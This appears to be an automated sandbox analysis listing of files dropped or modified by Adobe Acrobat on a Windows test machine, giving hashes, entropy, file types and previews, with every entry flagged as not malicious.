                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:modified
                                                  Size (bytes):403
                                                  Entropy (8bit):4.953858338552356
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4C313FE514B5F4E7E89329630909F8DC
                                                  SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                  SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                  SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4099
                                                  Entropy (8bit):5.227263534264796
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D4F3E36D9BAFD8819AD952ABB9F6490E
                                                  SHA1:2EEA13D8E44EC1A5399C3D9FB75A323E7DE4193A
                                                  SHA-256:24DCC645D2A865646A3266E99CA98E8E75D1B15C212116604B3CC45B8E70CD5E
                                                  SHA-512:564C734184219598DA7BC3FEB4F8D675E91CC6B7B542741FEEFC9A235C62D69EF5BE9E2EEED4A5D32AA7E5F7719A5411E5AE4D378DC72C9F7B544FF505C161A6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):322
                                                  Entropy (8bit):5.152684513178051
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:166C761E9F4B3A33A7AAE3B87ED2B55D
                                                  SHA1:87353712EAD4A6C5CE7A9830FB10D4897CD99E9E
                                                  SHA-256:1FE0AC57D71947077357D0E9EF0404AB5C65A39480E5E7FB3B39C9B26FBFB31F
                                                  SHA-512:2F957FE7E1707753C36D79754C45A71A7CA605E075B535C2B01475C40D8F157147C39354F07370FFE4355AF7ADEDEBDCA0AF4FD9701D9A92E20983FD8FB9AF92
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:2025/01/10-14:48:25.094 19a0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/10-14:48:25.095 19a0 Recovering log #3.2025/01/10-14:48:25.114 19a0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                  Category:dropped
                                                  Size (bytes):71190
                                                  Entropy (8bit):2.0232479618276225
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:776D2BA750E9B5D706481FD9DA56BC37
                                                  SHA1:BAA37B95AB4192497778CEEBE2733545A7D9FB1D
                                                  SHA-256:0176A5F931C88E3FCC2E79435CB758F94414F1CEC22CB738B60CA647CB6B9953
                                                  SHA-512:9A4B705C23A347EDB4F5ED8F2B4500B014B342EF57865F18939083EFB021A6F740083ACCFA450DF10394A78C31E478F2E5C9C9CCCD5B5AC5A3E83DF577A9FBD4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):57344
                                                  Entropy (8bit):3.291927920232006
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                  SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                  SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                  SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite Rollback Journal
                                                  Category:dropped
                                                  Size (bytes):16928
                                                  Entropy (8bit):1.2147803010617304
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:085BCD0532698A3A307BFD631399DA5A
                                                  SHA1:897B7A182619B4811D94218A14D72F86FE246CBD
                                                  SHA-256:B5523BCF6E25B25C65615827953A1414A185CF5348FF7B6DC0A0D680338DDF09
                                                  SHA-512:1E37E68CD8438FAA28F792B0C7E5BD3AEFE31C27B7A2B2B21AB4B79CE6CE1AA5D9668E055758C3F8BD98D9E599D2E8D129499AF81473D8C21363FA3B93B13C8B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.... .c......V..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:Certificate, Version=3
                                                  Category:dropped
                                                  Size (bytes):1391
                                                  Entropy (8bit):7.705940075877404
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                  Category:dropped
                                                  Size (bytes):71954
                                                  Entropy (8bit):7.996617769952133
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):192
                                                  Entropy (8bit):2.7386214950254377
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C30966CAE49EA803D9305A407F990B1F
                                                  SHA1:1957DA5C502AACEF5E13F2C2A9B5A87DA8287229
                                                  SHA-256:BD3B100B24404DCFB1A85B5156A6DACB6F7F9D2D7DD6BA25FB41962DBB3414F6
                                                  SHA-512:D1CE1EE9806B12E273D98A7AAED62096D315585BCA1630E84A00CE405F0CAA25726CF25BAFFA8787B700A0BA728E78EDC6EE04A7B4BBDD56EE8FB4932A76BB84
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:p...... .........5.c..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):328
                                                  Entropy (8bit):3.1330815974444413
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3DBF589CBF3E0EAD18451447376A224C
                                                  SHA1:79A33D24C75615C637113C5BE6E48B0CE073FA22
                                                  SHA-256:9D809282CCC778063693237554EA9498ABF6EBD062ED4BE9658B4DE84C68C812
                                                  SHA-512:E4218AE55D8D5478B332FBCA03D1656F824F3DEF36452E4A1308D994AB6BD29D4B4F8E29085102D18AD22B7DB2FC53E68F0594DB358CD8E8486D8D1D3E29F445
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:p...... ..........7..c..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):1233
                                                  Entropy (8bit):5.233980037532449
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):10880
                                                  Entropy (8bit):5.214360287289079
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):295
                                                  Entropy (8bit):5.382603194080466
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0653A0466823A4D25FBA4DBCC7087910
                                                  SHA1:C110F68DF2DB8681E719EC5EACD3D3ABE381397D
                                                  SHA-256:48107F8B36154661DAF491B1F17FA880D34B80D15158FD2A69EC363F11EE5214
                                                  SHA-512:8048A8E9E723795A0D6206783A9354E87E87FE3FEC368E63D2ECE095776BC332415102C29C7B35FF08AE62EF450CC72BCB3BF4348B6AAAC7DB6C2D2D38F6B16F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):294
                                                  Entropy (8bit):5.331464205880334
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C33A2B1A89A756FDA39BC427440B5BC7
                                                  SHA1:F71A31153F55086FB375BA5AD411ADA0CE80C7F2
                                                  SHA-256:05F44BB53DCA4AE8C104A051EE1846AE3A8E4574CE7A833D2219936C8F61D3D9
                                                  SHA-512:CBDF3234A39501E69467A5165AE28AB623C7B72367CB30D139638A39A06AF2C4F63D4B588407602F0511B41CE005D881E9269A89F91FFFF9C6D7EE873C659850
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):294
                                                  Entropy (8bit):5.308585647422911
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:419CF79BA7B2C1A976417E36C1AF2254
                                                  SHA1:469B8C8FB08514B18E365725656BB09FF42028CB
                                                  SHA-256:CBC9C618AAEF06CCB33F98EB7B95A6346FCFA1E99E686D25C32C629629FB8938
                                                  SHA-512:234EFBFB1189FD99F67E5F330E3CB76F21DB5A696E3E6BD9C495E254F6CCAD690DA13B11F9980F0D17F606BFE2F0E2B15257CE0265D9BA79F8D2A2998DA8A1F5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):285
                                                  Entropy (8bit):5.371658463795611
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DFDEB2422755003E3F1661775A5F3F91
                                                  SHA1:4282BAC5249EEE51DE2A3FBE7585FC9E01465A8E
                                                  SHA-256:A4BBBCE1DBC85790E50CF7BC869B49064237B72F1E6C0B19EFE4FB645FEAE95F
                                                  SHA-512:17B446B3F5A0895E88A66D6F8117CA9379CF935ACDE291C389C67AC7E83D90619AE3F49728A889A7AD5B86B66A7C9DA0D1492449B6E940FE8414738B4531E65E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1123
                                                  Entropy (8bit):5.686212490537583
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5038DE98414E8C320A5D1FDC622B47C8
                                                  SHA1:41184CDB8D6C3489D9B91E8BBB830C7F5183F064
                                                  SHA-256:87B45396B76B6780B036258A030DFBE34747E852206C7E3EBA610DCE8F09EE29
                                                  SHA-512:CB60E3C327A2932D3E19B4508D89CE7EB3797DA309FC9B4555AB024C1787F899AEDDBA8728942749C9EDE57D8AF30DD6818343F56EF0F157BC552C7F494C8029
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"analyticsData":{"responseGUID":"6576c724-d8c2-46c5-b1d6-9c5aefb489dc","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736718315335,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
